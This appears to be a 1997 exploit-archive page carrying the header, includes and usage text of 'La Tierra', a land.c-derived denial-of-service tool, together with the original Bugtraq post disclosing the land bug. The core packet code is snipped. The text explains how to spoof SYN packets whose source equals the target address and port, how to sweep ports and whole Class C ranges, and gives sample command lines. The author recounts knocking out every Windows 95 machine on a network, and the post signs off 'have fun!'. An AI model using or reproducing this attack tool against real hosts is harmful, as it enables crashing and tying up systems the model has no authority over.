/* [ http://www.rootshell.com/ ] */
/**************************************************************/
/* La Tierra v1.0 - by MondoMan (KeG), elmondo@usa.net */
/* Developed for stress testing Windows NT 4.0 Sp3 */
/* Modified version of land.c by m3lt, FLC */
/* */
/* This program crashes Windows 95, and will cause Windws NT */
/* 4.0, SP3 to utilize a high percentage of CPU. In some */
/* cases, CPU utilization peeks at %100. */
/* */
/* land.c description: */
/* land.c sends a spoofed packet with the SYN flag from the */
/* the same IP and port number as the destination. For */
/* example, if you want to crash 1.1.1.1, port 80, it would */
/* spoof 1.1.1.1 port 80 as the source. The problem is with */
/* NT Sp3, however, is once you do issue this packet to a */
/* port, NT Sp3 will ignore all other attempts - UNTIL .... */
/* */
/* La Tierra! */
/* */
/* La Tierra description: */
/* */
/* La Tierra basically works by sending NT Sp3 the same packet*/
/* used in land.c but to any port. Sounds simple? Theres */
/* more to it. Cycle through a range of ports - and see what */
/* happends. It doesn't appear to matter if the port is */
/* opened or closed :-) Since NT won't let this happen again */
/* on the same port, you simply change ports, and you can */
/* easily go back to the origianal port and it'll work again. */
/* */
/* As a test, I setup 2 NT Sp3 machines, ran latierra from my */
/* linux computer and watched as NT Sp3 tried to deal with it.*/
/* Just out of curiosity, I did a zone-transfer from my intra */
/* nets DNS server, wrote a perl script to walk the DNS table */
/* and blow-up every Windows 95 station it possibly could. */
/* Needless to say, my darn beeper starting going off! */
/* If using, VI, tab=3 (press ':', then set ts=3) */
/* If you want to send to an entire Class C range then */
/* simply specify the last octet with a '-', and the IP range */
/* will start at 1 and end with 254, incrementing with each */
/* loop. If Loop equals FOR_EVER, the loop cycles forever */
/* until the process is stopped. */
/* use the -h option for more help */
/* */
/* Good luck. */
/* */
/* Additional Parameters: */
/* */
/* -b beginning_port_number -e port_number */
/* -s seconds -l loop # of cycles */
/* default is every 7 seconds */
/* -o 1 supress additional output */
/* */
/* Compiled on Intel Pentium, 200mhz, RedHat Linux 2.0.27 */
/* */
/* gcc latierra.c -o latierra */
/* */
/**************************************************************/
#include stdio.h
#include netdb.h
#include arpa/inet.h
#include netinet/in.h
#include sys/types.h
#include string.h
#include getopt.h
#include sys/socket.h
#include netinet/ip.h
#include netinet/ip_tcp.h
#include netinet/protocols.h
[snip...]
printf("Arguments: -i dest_ip -b port# [-e port#] [-s seconds_delay] [-l loop]\n\n");
printf(" -i dest_ip = destination ip address such as 1.1.1.1\n");
printf(" If the last octet is '-', then the address will increment\n");
printf(" starting at 1, ending at 254 (Class C) on the next loop\n");
printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
printf(" -b port# = beginning port number (required).\n");
printf(" -e port# = ending port number (optional)\n");
printf(" -s seconds = seconds before incrementing port count.\n");
printf(" -o 1 = supress additional output to screen.\n");
printf(" -l loop = number of times to loop through ports or scan. %d=forever.\n\n", FOR_EVER);
printf(" Sample command lines:\n\n");
printf(" latierra -i 1.1.1.1 -b 80\n");
printf(" latierra -i 1.1.1.1 -b 23 -e 80 -s 2 -l 2 -o 1\n");
printf(" latierra -i 1.1.1.- -b 23 -e 80 -s 2 -l -5\n");
printf("\n -La Tierra\n");
return(-1);
}
[snip...]
=-=
From meltman@LAGGED.NET Wed Dec 10 13:28:49 1997
From: m3lt
To: BUGTRAQ@NETSPACE.ORG
Date: Thu, 20 Nov 1997 19:40:19 -0500
Subject: new TCP/IP bug in win95
hi,
i recently discovered a bug which freezes win95 boxes. here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.
the piece of code included in this message does that, so... have fun!
i haven't tested this bug on other platforms, i don't have the
ressources. please feel free to do so.
m3lt
meltman@lagged.net
--- snip snip -----------------------------------------------------------
=-=
|